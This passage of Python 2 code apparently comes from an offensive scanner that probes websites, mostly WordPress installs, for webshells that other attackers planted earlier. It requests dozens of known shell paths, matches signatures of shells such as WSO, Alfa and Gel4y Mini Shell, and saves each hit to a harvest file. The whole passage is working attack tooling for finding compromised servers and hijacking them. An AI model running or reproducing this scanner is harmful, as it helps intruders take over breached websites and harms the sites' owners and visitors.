{}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/themes.php',headers=headers, allow_redirects=True,timeout=15) if '403WebShell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('themes.txt', 'a').write(url + '/themes.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/colors/blue/blue.php?wall=',headers=headers, allow_redirects=True,timeout=15) if 'Black Bot' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('bk.txt', 'a').write(url + '/wp-admin/css/colors/blue/blue.php?wall=\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/yyobang/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('marju.txt', 'a').write(url + '/wp-content/plugins/yyobang/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/press/wp-class.php',headers=headers, allow_redirects=True,timeout=15) if 'WSO 4.2.5' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/plugins/press/wp-class.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/finley/min.php',headers=headers, allow_redirects=True,timeout=15) if 'Yanz Webshell!' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('yanz.txt', 'a').write(url + '/wp-content/themes/finley/min.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-head.php',headers=headers, allow_redirects=True,timeout=15) if 'Yanz Webshell!' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('yanz.txt', 'a').write(url + '/wp-head.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/radio.php',headers=headers, allow_redirects=True,timeout=15) if 'BlackDragon 2025' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('marju.txt', 'a').write(url + '/radio.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/radio.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('marju.txt', 'a').write(url + '/radio.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/colors/coffee/colors.php',headers=headers, allow_redirects=True,timeout=15) if 'EVOLUTION-MANAGER' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('EVOLUTION.txt', 'a').write(url + '/wp-admin/css/colors/coffee/colors.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/content.php',headers=headers, allow_redirects=True,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('shells.txt', 'a').write(url + '/content.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/shell20211028.php',headers=headers, allow_redirects=True,timeout=15) if 'File manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('shell20211028.txt', 'a').write(url + '/shell20211028.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/wp-daft/t62.php',headers=headers, allow_redirects=True,timeout=15) if 'WSO 2.6' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/plugins/wp-daft/t62.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/pomo/plugins.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-includes/pomo/plugins.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/SimplePie/index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-includes/SimplePie/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/wp-help/admin/wp-fclass.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/plugins/wp-help/admin/wp-fclass.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/wp-help/index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/plugins/wp-help/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/plugins.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-admin/images/plugins.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/hello-element/footer.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Uname:' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/themes/hello-element/footer.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/wordpress-three/miin.php',headers=headers, allow_redirects=True,timeout=15) if 'WSO 2.6' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/plugins/wordpress-three/miin.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/colors/coffee/index.php',headers=headers, allow_redirects=True,timeout=15) if 'input type="submit" name="submit" value=" >>"' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('repeaterpass.txt', 'a').write(url + '/wp-admin/css/colors/coffee/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/repeater.php',headers=headers, allow_redirects=True,timeout=15) if 'input type="submit" name="submit" value=" >>"' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('repeaterpass.txt', 'a').write(url + '/repeater.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/repeater.php',headers=headers, allow_redirects=True,timeout=15) if 'Yanz Webshell!' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('repeaternopass.txt', 'a').write(url + '/repeater.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/hellopress/wp_filemanager.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'PHP File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wp_filemanager.txt', 'a').write(url + '/wp-content/plugins/hellopress/wp_filemanager.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/info.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Tiny File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('tiny_filemanager.txt', 'a').write(url + '/.well-known/info.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/midnight/fmanager.php?p=password',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'PHP File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('filemanager.txt', 'a').write(url + '/wp-admin/css/midnight/fmanager.php?p=password\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/Goku.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'GOKU EXPLOITS' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('goku.txt', 'a').write(url + '/Goku.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/download-plugin/wp-access.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'PHP File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wp-access.txt', 'a').write(url + '/wp-content/plugins/download-plugin/wp-access.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/wso.php#UEjlZcWL',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wso.txt', 'a').write(url + '/wp-content/wso.php#UEjlZcWL\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/nf_tracking.php#password',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('nf_tracking.txt', 'a').write(url + '/nf_tracking.php#password\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/dropdown.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('dropdown.txt', 'a').write(url + '/dropdown.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/dropdown.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('dropdown.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/digital-download/new.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/wp-pridmag/init.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '#0x2525' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('init.txt', 'a').write(url + '/wp-content/themes/wp-pridmag/init.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/json.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'xXx Kelelawar Cyber Team xXx' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('json.txt', 'a').write(url + '/wp-content/json.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/simple/simple.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'GOOGLE' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('simple.txt', 'a').write(url + '/wp-content/plugins/simple/simple.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/Requests/src/Utility/tiny.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'H3K | Tiny File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('tiny.txt', 'a').write(url + '/wp-includes/Requests/src/Utility/tiny.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/images/smilies/dd.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'DRUNK SHELL BETA ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('DRUNK.txt', 'a').write(url + '/wp-includes/images/smilies/dd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/php-compat/combat.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Mr.Combet Webshell 🔥' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('combat.txt', 'a').write(url + '/wp-includes/php-compat/combat.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/rest-api/fields/yoxdu.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Get S.H.E.L.L.en v1.0 | BY ..' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('shells.txt', 'a').write(url + '/wp-includes/rest-api/fields/yoxdu.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/fmadmin.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'PHP File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('phpfile.txt', 'a').write(url + '/wp-admin/fmadmin.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/Requests/src/system.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('system.txt', 'a').write(url + '/wp-includes/Requests/src/system.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/colors/blue/uploader.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('uploader.txt', 'a').write(url + '/wp-admin/css/colors/blue/uploader.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/commenth.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Url: ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('url.txt', 'a').write(url + '/wp-admin/css/commenth.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/headergi.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Url: ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('url.txt', 'a').write(url + '/wp-admin/images/headergi.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/headerg.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Url: ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('url.txt', 'a').write(url + '/wp-admin/images/headerg.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/js/footerm.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Url: ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('url.txt', 'a').write(url + '/wp-admin/js/footerm.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/footerw.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Url: ' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('url.txt', 'a').write(url + '/wp-admin/images/footerw.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/class-wp-cmd.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('class-wp-cmd.txt', 'a').write(url + '/wp-includes/class-wp-cmd.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/OK.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '芝麻web文件管理' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('OK.txt', 'a').write(url + '/wp-admin/css/OK.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/css/go.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '芝麻web文件管理' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('OK.txt', 'a').write(url + '/wp-admin/css/go.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/maint/wp-act.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '芝麻web文件管理' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('OK.txt', 'a').write(url + '/wp-admin/maint/wp-act.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/maint/yes.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '芝麻web文件管理' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('OK.txt', 'a').write(url + '/wp-admin/maint/yes.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/alf.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('alfa.txt', 'a').write(url + '/alf.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/autoload_classmap.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('autoload_classmap.txt', 'a').write(url + '/autoload_classmap.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/FoxWSO.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('FoxWSO.txt', 'a').write(url + '/FoxWSO.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wikindex.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wikindex.txt', 'a').write(url + '/wikindex.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/0byte.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('0byte.txt', 'a').write(url + '/0byte.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-wso.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('wp-wso.txt', 'a').write(url + '/wp-wso.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/xleet.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('xleet.txt', 'a').write(url + '/xleet.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/alfaindex.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('alfaindex.txt', 'a').write(url + '/alfaindex.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/rxr.php?rxr',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('rxr.txt', 'a').write(url + '/rxr.php?rxr\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/baindex.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('baindex.txt', 'a').write(url + '/baindex.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/1index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('index.txt', 'a').write(url + '/1index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/2index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('index.txt', 'a').write(url + '/2index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/3index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('index.txt', 'a').write(url + '/3index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/4index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('index.txt', 'a').write(url + '/4index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/ALFA_DATA/alfacgiapi/perl.alfa.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('ALFA_DATA.txt', 'a').write(url + '/ALFA_DATA/alfacgiapi/perl.alfa.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/ALFA_DATA/alfacgiapi/perl.alfa.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('ALFA_DATA.txt', 'a').write(url + '/.well-known/ALFA_DATA/alfacgiapi/perl.alfa.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/alfacgiapi/perl.alfa.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('ALFA_DATA.txt', 'a').write(url + '/wp-admin/alfacgiapi/perl.alfa.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/alfacgiapi/perl.alfa.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('ALFA_DATA.txt', 'a').write(url + '/alfacgiapi/perl.alfa.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/upspy/index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('upspy.txt', 'a').write(url + '/wp-content/plugins/upspy/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/ubh/index.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '-rw-r--r--' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('ubh.txt', 'a').write(url + '/wp-content/plugins/ubh/index.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/rafosul.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'PHP File Manager' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('rafosul.txt', 'a').write(url + '/rafosul.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/classwithtostring.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'x3x3x3x_5h3ll' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('classwithtostring.txt', 'a').write(url + '/classwithtostring.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-content/plugins/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/images/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-admin/images/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.tmb/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/.tmb/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/.well-known/acme-challenge/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/.well-known/acme-challenge/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/cgi-bin/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/cgi-bin/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/user/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-admin/user/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/upgrade/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-content/upgrade/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/js/widgets/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-admin/js/widgets/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-admin/maint/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-admin/maint/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/ID3/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'Gel4y Mini Shell' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('moon.txt', 'a').write(url + '/wp-includes/ID3/moon.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-includes/certificates/moon.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) 